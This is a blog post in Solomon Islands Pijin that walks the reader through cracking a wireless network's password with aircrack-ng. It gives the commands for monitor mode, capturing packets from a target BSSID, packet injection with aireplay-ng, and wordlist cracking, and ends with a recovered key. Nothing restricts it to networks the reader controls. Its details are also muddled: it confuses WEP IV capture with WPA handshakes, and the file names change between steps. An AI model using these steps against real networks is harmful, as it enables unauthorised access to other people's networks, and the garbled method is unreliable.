Saposi u runnem wan linux OS long PC blo u or laptop hemi shud be isi. Sposi u stap usum windows u save runnem linux long wan virtual machine blo folem method ya.
- Sposi u kat wirless card lo PC blo u hemi gud, normally evri laptop shud kat internal wireless card lo olketa finis.
- installem aircrack lo linux machine blo u (linux ikat fulap distro) bei lo sake blo demonstration ya mi runem lo wan komputa wei Ubuntu operating system hemi instal lo hem.
ikat sixfala samting blo yumi mkem blo karem paswod blo wan wireless AP (acces point)
- installem aircrack lo ubuntu komputa blo u
apt-get install aircrack-ng
- yu finem mo identifyem netwok interface (oltaim bambai hemi wan wlan0 or wlan1 etc) blo karem paswod blo hem.
$ iwconfig
hemi shud kivim wan nem olsem blo showem sei u kat wan netwok cardwlan0 IEEE 802.11 Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dBm
Onem netwok card yaairmon-ng start wlan0
- Naya u identifyem netwok BSSID wei u intres lo hem blo crackem paswod blo hem
airodump-ng wlan0
Channel # 6 bambai yumi usum lo step 4 - Lo step naya bambai yumi sniffim mo capturem ol pakets wei ie exchange bitwin laptop blo u wtem SSID ya, oli recomendem blo u mas kasem (capturem) 5000 pakets olsem
airodump-ng -c 6 -w data-capture 00:11:95:9F:FD:F4 --ivs mon0
switch -c hemi minim channel afta u putum namba blo chanel ya wei hemi 6 (refer lo step 3) switch -w hemi blo writem wanhm u capturem iko long root or Home directory blo ubuntu machine blo u. data-capture hemi minim sei u capturem BSSID ya nau iko long file lo root blo u. File ya nau later on bambai u crackem wetem air-crack.
switch --ivs hemi blo filterem nomo ol ivs packets. IVS oli stap usum wetem secret key taim blo data encryption. So yumi wandem hemia nau.
mon0 hemi wan alias blo wlan0 bei lo promicious mode (taim hemi stap sniff mode) mas jensem nem wlan0 iko mon0 sposi no bamabai ikat conflict mo capture bambai no wok gud.
Ok while airodump-ng ie stap run lo wan terminal openem wan niu terminal afta mekem step 5 - Naya injectem sam pakets blo yumi kasem wan "WPA Handshake"
# aireplay-ng -3 -b 00:11:95:9F:FD:F4 -h 00:13:02:30:FF:EC mon0
- Nauya yumi crackem WPA key wei ie captured fnis
# aircrack-ng -w /root/nmap.lst WPA2-01.ivs
Hemi depend lo paswod blo BSSID ya bei sposi wan soft wan bambai kwik taim nomo hemi shloud kivim WPA key blo uKEY FOUND! [ 4E:6F:E9:7E:55 ]
hemia andap ya nau passod 4E:6F:E9:7E:55.
Phew naya 2:37 lo morning slip ie jas kik gud ya nau.
No comments:
Post a Comment